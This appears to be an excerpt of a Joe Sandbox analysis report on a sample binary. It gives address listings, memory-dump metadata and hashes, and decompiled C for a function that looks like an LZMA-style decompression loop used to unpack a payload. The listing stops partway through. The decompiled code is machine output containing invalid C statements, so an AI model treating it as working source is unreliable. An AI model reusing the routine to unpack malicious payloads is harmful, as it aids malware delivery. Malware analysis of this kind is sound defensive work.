                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x004071dc
                                                        0x004071e2
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x0040711b
                                                        0x00000000
                                                        0x00406f90

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                        • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                        • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                        • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406CA2() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071F9))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
